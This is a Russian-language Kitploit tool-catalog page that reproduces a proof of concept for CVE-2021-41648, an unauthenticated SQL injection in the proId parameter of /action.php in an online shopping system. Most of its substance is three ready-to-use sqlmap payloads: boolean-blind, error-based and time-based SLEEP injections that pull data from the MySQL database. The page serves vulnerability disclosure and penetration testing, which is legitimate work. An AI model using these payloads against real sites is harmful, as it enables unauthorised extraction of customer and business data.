Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41648 — Эксплойт, подтверждающий концепцию, для неаутентифицированной SQL-инъекции в online-shopping-system через параметр proId, позволяющий извлекать данные из базы данных MySQL. | Kitploit
Инструменты/GitHubGitHub/mobiusbinary/cve-2021-41648
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubmobiusbinary/cve-2021-41648

CVE-2021-41648

Эксплойт, подтверждающий концепцию, для неаутентифицированной SQL-инъекции в online-shopping-system через параметр proId, позволяющий извлекать данные из базы данных MySQL.

Репозиторий
4 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41648

CVE-2021-41648 SQL-инъекция в онлайн-системе покупок

Система онлайн-покупок уязвима для неаутентифицированных ошибок/логических слепых и основанных на ошибках SQL-инъекций.

Параметр proId на странице /action.php не санирует пользовательский ввод, что позволяет злоумышленнику извлекать конфиденциальные данные из нижележащей базы данных MySQL.

Ссылка на приложение

online-shopping-system

Затронутые компоненты и параметр

URL: /action.php
ПАРАМЕТР: proId

PoC's (Доказательства концепции)

ПОЛЕЗНЫЕ НАГРУЗКИ SQLMAP

Параметр proId на странице /action.php

Параметр: proId (POST) Тип: логическая слепая Название: OR логическая слепая - предложение WHERE или HAVING (NOT - комментарий MySQL) Полезная нагрузка: proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1

Тип: основанный на ошибках Название: MySQL >= 5.0 OR основанный на ошибках - предложение WHERE, HAVING, ORDER BY или GROUP BY (FLOOR) Полезная нагрузка: proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1

Тип: временная слепая Название: MySQL >= 5.0.12 AND временная слепая (запрос SLEEP) Полезная нагрузка: proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1

Если изображение PoC нечеткое, нажмите на GIF, чтобы загрузить его в лучшем разрешении.

POC - proId

Обнаружено

Jason Colyvas
MOBIUSBINARY
21 сентября 2021 г.

Скачать инструмент